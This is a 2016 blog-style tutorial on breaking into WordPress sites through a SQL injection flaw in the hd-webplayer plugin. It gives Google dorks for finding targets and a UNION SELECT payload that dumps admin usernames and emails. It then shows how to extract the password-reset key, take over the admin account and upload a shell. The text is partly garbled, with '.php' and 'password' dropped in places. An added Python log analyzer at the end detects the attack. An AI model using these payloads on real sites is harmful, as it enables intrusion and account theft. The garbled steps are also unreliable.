Wednesday, May 18, 2016
HOW TO WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING
First of all we need to find a vulnerable page.
We enter this in Google:
# Dork 1 (config.p)
inurl:"/wp-content/plugins/hd-webplayer/config.p?id="
# Dork 2 (playlist.p)
inurl:"/wp-content/plugins/hd-webplayer/playlist.p?id="
# Dork 3 (general):
inurl:"/wp-content/plugins/hd-webplayer/"
Once you have found a site, you need to find the admin email and username.
I will be using this site as an example:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=3
When I add a ' the text disappears, so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need the admin username and email.
We need to inject:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
http://www.site.com/wp-login.p
And press "Lost your ?"
Now enter either the username or the email.
Either one is accepted, so it doesn't matter which.
I entered the email.
When you get:
"Check your e-mail for the confirmation link."
It means that the reset was sent successfully.
Now we need to get the .
Go back to the syntax you used for extracting email and username and do this:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user__,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
wp-login.p?action=rp&=reset&login=username
NOTE: Replace = & login=
So my link will be:
Enter new :
Login with new and shell it.
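Seen from the defending side, the sequence in this post leaves a recognizable trail in the web server access log. The following is an added example, not part of the original post: it flags non-numeric id values under the hd-webplayer plugin path and any reset request to wp-login.php that follows from the same client. The log lines are constructed, and the .php file names and the analyze() helper are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

PLUGIN_PREFIX = "/wp-content/plugins/hd-webplayer/"  # plugin path from the post
RESET_ACTIONS = {"lostpassword", "rp", "resetpass"}  # wp-login.php reset flow
# Common/combined log format: client IP ... "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [18/May/2016:10:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=3 HTTP/1.1" 200 512
203.0.113.9 - - [18/May/2016:10:02:11 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=3%27 HTTP/1.1" 200 0
203.0.113.9 - - [18/May/2016:10:03:40 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=-3%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 734
203.0.113.9 - - [18/May/2016:10:04:02 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
198.51.100.7 - - [18/May/2016:10:05:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.9 - - [18/May/2016:10:06:30 +0000] "GET /wp-login.php?action=rp&login=admin HTTP/1.1" 200 2048
"""

def analyze(log_text):
    """Return (injection_hits, reset_followups) as lists of (ip, target)."""
    suspects, hits, followups = set(), [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        url = urlsplit(target)
        # parse_qs URL-decodes values, so %27 and %20 are seen as ' and space.
        params = parse_qs(url.query, keep_blank_values=True)
        if url.path.startswith(PLUGIN_PREFIX):
            # Legitimate id values here are plain integers; anything else is suspect.
            if any(not re.fullmatch(r"\d+", v) for v in params.get("id", [])):
                suspects.add(ip)
                hits.append((ip, target))
        elif url.path.endswith("/wp-login.php") and ip in suspects:
            # A reset request from a client that just probed the plugin.
            if RESET_ACTIONS & set(params.get("action", [])):
                followups.append((ip, target))
    return hits, followups

if __name__ == "__main__":
    injection_hits, reset_followups = analyze(SAMPLE_LOG)
    for ip, target in injection_hits:
        print("non-numeric id on plugin path:", ip, target)
    for ip, target in reset_followups:
        print("reset request after probe:    ", ip, target)
```

A hit from the second list is the stronger signal: it means the account named in the request should have its reset state invalidated and the plugin removed or patched before anything else.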